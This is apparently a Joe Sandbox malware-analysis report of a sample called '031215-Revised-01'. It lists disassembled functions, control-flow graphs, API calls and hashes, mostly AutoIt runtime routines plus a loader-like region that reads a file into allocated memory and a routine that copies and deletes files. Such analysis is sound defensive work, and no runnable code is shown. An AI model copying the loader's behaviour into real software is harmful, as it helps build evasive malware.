                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: dc5961275b683c60357c3ee4531f426310856e8e76fc493cfc81880412b655be
                                        • Instruction ID: d4d550e78b9fca8fbba3b557bff58cb0f0948012978d7c5dc05fb625a2b1b151
                                        • Opcode Fuzzy Hash: dc5961275b683c60357c3ee4531f426310856e8e76fc493cfc81880412b655be
                                        • Instruction Fuzzy Hash: D342C070A04241EFD774DB24C884FAEB7F1BF46304F14861EE599876A2D774E884CB96
                                        Function 00072CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00072D07
                                        • RegisterClassExW.USER32(00000030), ref: 00072D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00072D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00072D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00072D6F
                                        • LoadIconW.USER32(000000A9), ref: 00072D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00072D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: bd7ce160f5efe483893d693e19c5a8370932662f7443e8ff1ffcd3911c32ca2b
                                        • Instruction ID: 1b81a5588c60f31fd38eb854b3cddbd59fc84547434b5c272257dd0bad8e1357
                                        • Opcode Fuzzy Hash: bd7ce160f5efe483893d693e19c5a8370932662f7443e8ff1ffcd3911c32ca2b
                                        • Instruction Fuzzy Hash: DD21C2B9951318EFDB00DFA4EC89BDDBBB8FB09704F00821AF591A66A0D7B54584CF91
                                        Function 000A8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 302 a8d45-a8d55 303 a8d6f-a8d71 302->303 304 a8d57-a8d6a call 9f2c6 call 9f2d9 302->304 306 a90d9-a90e6 call 9f2c6 call 9f2d9 303->306 307 a8d77-a8d7d 303->307 320 a90f1 304->320 325 a90ec call a27ec 306->325 307->306 310 a8d83-a8dae 307->310 310->306 313 a8db4-a8dbd 310->313 316 a8dbf-a8dd2 call 9f2c6 call 9f2d9 313->316 317 a8dd7-a8dd9 313->317 316->325 318 a8ddf-a8de3 317->318 319 a90d5-a90d7 317->319 318->319 323 a8de9-a8ded 318->323 324 a90f4-a90f9 319->324 320->324 323->316 327 a8def-a8e06 323->327 325->320 330 a8e08-a8e0b 327->330 331 a8e23-a8e2c 327->331 333 a8e0d-a8e13 330->333 334 a8e15-a8e1e 330->334 335 a8e4a-a8e54 331->335 336 a8e2e-a8e45 call 9f2c6 call 9f2d9 call a27ec 331->336 333->334 333->336 337 a8ebf-a8ed9 334->337 339 a8e5b-a8e79 call a3820 call a29c8 * 2 335->339 340 a8e56-a8e58 335->340 368 a900c 336->368 341 a8edf-a8eef 337->341 342 a8fad-a8fb6 call af89b 337->342 371 a8e7b-a8e91 call 9f2d9 call 9f2c6 339->371 372 a8e96-a8ebc call a9424 339->372 340->339 341->342 345 a8ef5-a8ef7 341->345 355 a8fb8-a8fca 342->355 356 a9029 342->356 345->342 349 a8efd-a8f23 345->349 349->342 353 a8f29-a8f3c 349->353 353->342 358 a8f3e-a8f40 353->358 355->356 361 a8fcc-a8fdb GetConsoleMode 355->361 360 a902d-a9045 ReadFile 356->360 358->342 363 a8f42-a8f6d 358->363 365 a90a1-a90ac GetLastError 360->365 366 a9047-a904d 360->366 361->356 367 a8fdd-a8fe1 361->367 363->342 370 a8f6f-a8f82 363->370 373 a90ae-a90c0 call 9f2d9 call 9f2c6 365->373 374 a90c5-a90c8 365->374 366->365 375 a904f 366->375 367->360 376 a8fe3-a8ffd ReadConsoleW 367->376 369 a900f-a9019 call a29c8 368->369 369->324 370->342 382 a8f84-a8f86 370->382 371->368 372->337 373->368 379 a90ce-a90d0 374->379 380 a9005-a900b call 9f2a3 374->380 386 a9052-a9064 375->386 377 a901e-a9027 376->377 378 a8fff GetLastError 376->378 377->386 378->380 379->369 380->368 382->342 389 a8f88-a8fa8 382->389 386->369 393 a9066-a906a 386->393 389->342 397 a906c-a907c call a8a61 393->397 398 a9083-a908e 393->398 407 a907f-a9081 397->407 400 a909a-a909f call a88a1 398->400 401 a9090 call a8bb1 398->401 408 a9095-a9098 400->408 401->408 407->369 408->407
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-3497715306
                                        • Opcode ID: d93e0df0a561a838e0ce9b958fc3b3f61ba99a7f7f6b140f613c2860ed190756
                                        • Instruction ID: 601b8fadcd092634ce1b40de3623fc4ec9ca6ff4ad440b021f4b282260d31f72
                                        • Opcode Fuzzy Hash: d93e0df0a561a838e0ce9b958fc3b3f61ba99a7f7f6b140f613c2860ed190756
                                        • Instruction Fuzzy Hash: 0BC1D174A04249AFDF61DFE8C845BEDBBF0AF1B350F1481A9E954A7392C7309941CB61
                                        Function 000B065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 b065b-b068b call b042f 413 b068d-b0698 call 9f2c6 410->413 414 b06a6-b06b2 call a5221 410->414 419 b069a-b06a1 call 9f2d9 413->419 420 b06cb-b0714 call b039a 414->420 421 b06b4-b06c9 call 9f2c6 call 9f2d9 414->421 431 b097d-b0983 419->431 429 b0781-b078a GetFileType 420->429 430 b0716-b071f 420->430 421->419 435 b078c-b07bd GetLastError call 9f2a3 CloseHandle 429->435 436 b07d3-b07d6 429->436 433 b0721-b0725 430->433 434 b0756-b077c GetLastError call 9f2a3 430->434 433->434 439 b0727-b0754 call b039a 433->439 434->419 435->419 447 b07c3-b07ce call 9f2d9 435->447 437 b07d8-b07dd 436->437 438 b07df-b07e5 436->438 443 b07e9-b0837 call a516a 437->443 438->443 444 b07e7 438->444 439->429 439->434 453 b0839-b0845 call b05ab 443->453 454 b0847-b086b call b014d 443->454 444->443 447->419 453->454 461 b086f-b0879 call a86ae 453->461 459 b087e-b08c1 454->459 460 b086d 454->460 463 b08c3-b08c7 459->463 464 b08e2-b08f0 459->464 460->461 461->431 463->464 466 b08c9-b08dd 463->466 467 b097b 464->467 468 b08f6-b08fa 464->468 466->464 467->431 468->467 469 b08fc-b092f CloseHandle call b039a 468->469 472 b0963-b0977 469->472 473 b0931-b095d GetLastError call 9f2a3 call a5333 469->473 472->467 473->472
                                        APIs
                                          • Part of subcall function 000B039A: CreateFileW.KERNELBASE(00000000,00000000,?,000B0704,?,?,00000000,?,000B0704,00000000,0000000C), ref: 000B03B7
                                        • GetLastError.KERNEL32 ref: 000B076F
                                        • __dosmaperr.LIBCMT ref: 000B0776
                                        • GetFileType.KERNELBASE(00000000), ref: 000B0782
                                        • GetLastError.KERNEL32 ref: 000B078C
                                        • __dosmaperr.LIBCMT ref: 000B0795
                                        • CloseHandle.KERNEL32(00000000), ref: 000B07B5
                                        • CloseHandle.KERNEL32(?), ref: 000B08FF
                                        • GetLastError.KERNEL32 ref: 000B0931
                                        • __dosmaperr.LIBCMT ref: 000B0938
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: fa548a7f5bdb0f34a2d257adfc341d9e35c20505110dea3ae8b526d9ddee411c
                                        • Instruction ID: 73d8d445f1cd65ad6d38fbebc56dfc8429be26222b17c68274890a4c942ca36f
                                        • Opcode Fuzzy Hash: fa548a7f5bdb0f34a2d257adfc341d9e35c20505110dea3ae8b526d9ddee411c
                                        • Instruction Fuzzy Hash: 9CA11332A141058FDF29AF68D851BEE7BE0AB0A320F144159F855DF3E2DB319D52CB91
                                        Function 0007344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00073A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141418,?,00072E7F,?,?,?,00000000), ref: 00073A78
                                          • Part of subcall function 00073357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00073379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0007356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000B318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000B31CE
                                        • RegCloseKey.ADVAPI32(?), ref: 000B3210
                                        • _wcslen.LIBCMT ref: 000B3277
                                        • _wcslen.LIBCMT ref: 000B3286
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: 26ecbc3a792b2fe440dff8f374edd1d5b78070afa094710e03228a99c9a21140
                                        • Instruction ID: 2ec33188594fe7577287d1c468ad68b17ba524838e1e6fea5406d919af226dc4
                                        • Opcode Fuzzy Hash: 26ecbc3a792b2fe440dff8f374edd1d5b78070afa094710e03228a99c9a21140
                                        • Instruction Fuzzy Hash: 9471A2719043019EC314DF25DC828ABBBF8FF8A740F90452DF585931B1EB749A88CB56
                                        Function 00072B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00072B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00072B9D
                                        • LoadIconW.USER32(00000063), ref: 00072BB3
                                        • LoadIconW.USER32(000000A4), ref: 00072BC5
                                        • LoadIconW.USER32(000000A2), ref: 00072BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00072BEF
                                        • RegisterClassExW.USER32(?), ref: 00072C40
                                          • Part of subcall function 00072CD4: GetSysColorBrush.USER32(0000000F), ref: 00072D07
                                          • Part of subcall function 00072CD4: RegisterClassExW.USER32(00000030), ref: 00072D31
                                          • Part of subcall function 00072CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00072D42
                                          • Part of subcall function 00072CD4: InitCommonControlsEx.COMCTL32(?), ref: 00072D5F
                                          • Part of subcall function 00072CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00072D6F
                                          • Part of subcall function 00072CD4: LoadIconW.USER32(000000A9), ref: 00072D85
                                          • Part of subcall function 00072CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00072D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 5735e6348481faff5ce45f38e487fee5158758d3edf3f1c2feba61fe431ce626
                                        • Instruction ID: 6098f03a9b3f82cb6b414a678f4d5ad7ebceba43b10fdb56a6096ec5184ad378
                                        • Opcode Fuzzy Hash: 5735e6348481faff5ce45f38e487fee5158758d3edf3f1c2feba61fe431ce626
                                        • Instruction Fuzzy Hash: 0E212978E40318BBDB109FA5EC95AA97FB4FB49B60F00452AF504A6AB0D7B505C0CF94
                                        Function 00073170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 551 73170-73185 552 73187-7318a 551->552 553 731e5-731e7 551->553 554 7318c-73193 552->554 555 731eb 552->555 553->552 556 731e9 553->556 557 73265-7326d PostQuitMessage 554->557 558 73199-7319e 554->558 560 b2dfb-b2e23 call 718e2 call 8e499 555->560 561 731f1-731f6 555->561 559 731d0-731d8 DefWindowProcW 556->559 566 73219-7321b 557->566 563 731a4-731a8 558->563 564 b2e7c-b2e90 call dbf30 558->564 565 731de-731e4 559->565 596 b2e28-b2e2f 560->596 567 7321d-73244 SetTimer RegisterWindowMessageW 561->567 568 731f8-731fb 561->568 572 b2e68-b2e72 call dc161 563->572 573 731ae-731b3 563->573 564->566 590 b2e96 564->590 566->565 567->566 574 73246-73251 CreatePopupMenu 567->574 569 73201-73214 KillTimer call 730f2 call 73c50 568->569 570 b2d9c-b2d9f 568->570 569->566 582 b2da1-b2da5 570->582 583 b2dd7-b2df6 MoveWindow 570->583 586 b2e77 572->586 579 b2e4d-b2e54 573->579 580 731b9-731be 573->580 574->566 579->559 584 b2e5a-b2e63 call d0ad7 579->584 588 731c4-731ca 580->588 589 73253-73263 call 7326f 580->589 591 b2da7-b2daa 582->591 592 b2dc6-b2dd2 SetFocus 582->592 583->566 584->559 586->566 588->559 588->596 589->566 590->559 591->588 597 b2db0-b2dc1 call 718e2 591->597 592->566 596->559 600 b2e35-b2e48 call 730f2 call 73837 596->600 597->566 600->559
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0007316A,?,?), ref: 000731D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0007316A,?,?), ref: 00073204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00073227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0007316A,?,?), ref: 00073232
                                        • CreatePopupMenu.USER32 ref: 00073246
                                        • PostQuitMessage.USER32(00000000), ref: 00073267
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: e6ff6852b6ce5f0e279a819547e975d684611619f00cf5c920b075487e46cdc5
                                        • Instruction ID: b5fa77466677c790ad024f9ffdcd185612d90c4942f35d3fd6e5a463e20336d7
                                        • Opcode Fuzzy Hash: e6ff6852b6ce5f0e279a819547e975d684611619f00cf5c920b075487e46cdc5
                                        • Instruction Fuzzy Hash: F9416D35B50204B7FB241B38CD09BFD3796E706350F148225F90D856B3C7788AC1ABAA
                                        Function 01392620 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 607 1392620-13926ce call 1390000 610 13926d5-13926fb call 1393530 CreateFileW 607->610 613 13926fd 610->613 614 1392702-1392712 610->614 615 139284d-1392851 613->615 622 1392719-1392733 VirtualAlloc 614->622 623 1392714 614->623 616 1392893-1392896 615->616 617 1392853-1392857 615->617 619 1392899-13928a0 616->619 620 1392859-139285c 617->620 621 1392863-1392867 617->621 624 13928a2-13928ad 619->624 625 13928f5-139290a 619->625 620->621 626 1392869-1392873 621->626 627 1392877-139287b 621->627 628 139273a-1392751 ReadFile 622->628 629 1392735 622->629 623->615 632 13928af 624->632 633 13928b1-13928bd 624->633 634 139291a-1392922 625->634 635 139290c-1392917 VirtualFree 625->635 626->627 636 139288b 627->636 637 139287d-1392887 627->637 630 1392758-1392798 VirtualAlloc 628->630 631 1392753 628->631 629->615 638 139279a 630->638 639 139279f-13927ba call 1393780 630->639 631->615 632->625 640 13928bf-13928cf 633->640 641 13928d1-13928dd 633->641 635->634 636->616 637->636 638->615 647 13927c5-13927cf 639->647 643 13928f3 640->643 644 13928ea-13928f0 641->644 645 13928df-13928e8 641->645 643->619 644->643 645->643 648 13927d1-1392800 call 1393780 647->648 649 1392802-1392816 call 1393590 647->649 648->647 655 1392818 649->655 656 139281a-139281e 649->656 655->615 657 139282a-139282e 656->657 658 1392820-1392824 FindCloseChangeNotification 656->658 659 139283e-1392847 657->659 660 1392830-139283b VirtualFree 657->660 658->657 659->610 659->615 660->659
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013926F1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01392917
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                        • Instruction ID: 8348bda15fe5c6be2698c57a7f1ab1c9adba67f890aa425493e23c691387e2a6
                                        • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                        • Instruction Fuzzy Hash: 6DA10774E04209EBDF14CFA8C894BEEBBB5FF48308F208559E511BB281D7759A81CB94
                                        Function 00072C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 671 72c63-72cd3 CreateWindowExW * 2 ShowWindow * 2
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00072C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00072CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00071CAD,?), ref: 00072CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00071CAD,?), ref: 00072CCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: d6a6b8404654628405ab64b4e75181b1d6fb7ebfe3b7d03d39d999bdd8110586
                                        • Instruction ID: d4445789eb3d08353b5190dd01c74e5bdabf576eadbd906d0c2396e771a1a0e4
                                        • Opcode Fuzzy Hash: d6a6b8404654628405ab64b4e75181b1d6fb7ebfe3b7d03d39d999bdd8110586
                                        • Instruction Fuzzy Hash: FAF0DA795402947AEB311B17AC48E773EBDE7C7F60B00005AF900A29B0C6A118D4DEB0
                                        Function 013923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 786 13923b0-1392515 call 1390000 call 13922a0 CreateFileW 793 139251c-139252c 786->793 794 1392517 786->794 797 139252e 793->797 798 1392533-139254d VirtualAlloc 793->798 795 13925cc-13925d1 794->795 797->795 799 139254f 798->799 800 1392551-1392568 ReadFile 798->800 799->795 801 139256a 800->801 802 139256c-13925a6 call 13922e0 call 13912a0 800->802 801->795 807 13925a8-13925bd call 1392330 802->807 808 13925c2-13925ca ExitProcess 802->808 807->808 808->795
                                        APIs
                                          • Part of subcall function 013922A0: Sleep.KERNELBASE(000001F4), ref: 013922B1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0139250B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: MUFSRUTIQUUAI92Y13UO718OXK
                                        • API String ID: 2694422964-710262851
                                        • Opcode ID: 6f58ef37fef3e5e9f028910e66ae70fc0159bf73e3b004eab8c5b450540f8cda
                                        • Instruction ID: 241c0af6eefff561c5a9e5989e1a3a0cff585aa374b60f90a6a48b54a45ef982
                                        • Opcode Fuzzy Hash: 6f58ef37fef3e5e9f028910e66ae70fc0159bf73e3b004eab8c5b450540f8cda
                                        • Instruction Fuzzy Hash: C7618130D04689EAEF11DBE8C854BEFBB78AF19304F044199E149BB2C1D7B91B49CB65
                                        Function 000E2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 810 e2947-e29b9 call b1f50 call e25d6 call 8fe0b call 75722 call e274e call 7511f call 95232 825 e29bf-e29c6 call e2e66 810->825 826 e2a6c-e2a73 call e2e66 810->826 831 e29cc-e2a6a call 9d583 call 94983 call 99038 call 9d583 call 99038 * 2 825->831 832 e2a75-e2a77 825->832 826->832 833 e2a7c 826->833 836 e2a7f-e2b3a call 750f5 * 8 call e3017 call 9e5eb 831->836 835 e2cb6-e2cb7 832->835 833->836 839 e2cd5-e2cdb 835->839 875 e2b3c-e2b3e 836->875 876 e2b43-e2b5e call e2792 836->876 840 e2cdd-e2ced call 8fdcd call 8fe14 839->840 841 e2cf0-e2cf6 839->841 840->841 875->835 879 e2b64-e2b6c 876->879 880 e2bf0-e2bfc call 9e678 876->880 881 e2b6e-e2b72 879->881 882 e2b74 879->882 887 e2bfe-e2c0d DeleteFileW 880->887 888 e2c12-e2c16 880->888 884 e2b79-e2b97 call 750f5 881->884 882->884 892 e2b99-e2b9e 884->892 893 e2bc1-e2bd7 call e211d call 9dbb3 884->893 887->835 890 e2c18-e2c7e call e25d6 call 9d2eb * 2 call e22ce 888->890 891 e2c91-e2ca5 CopyFileW 888->891 895 e2cb9-e2ccf DeleteFileW call e2fd8 890->895 915 e2c80-e2c8f DeleteFileW 890->915 891->895 896 e2ca7-e2cb4 DeleteFileW 891->896 897 e2ba1-e2bb4 call e28d2 892->897 910 e2bdc-e2be7 893->910 901 e2cd4 895->901 896->835 908 e2bb6-e2bbf 897->908 901->839 908->893 910->879 912 e2bed 910->912 912->880 915->835
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2C05
                                        • DeleteFileW.KERNEL32(?), ref: 000E2C87
                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E2C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: e627dde3aee2eb773776b8ebc46295cd0e2840d1a0a4df43844726ae18abcef2
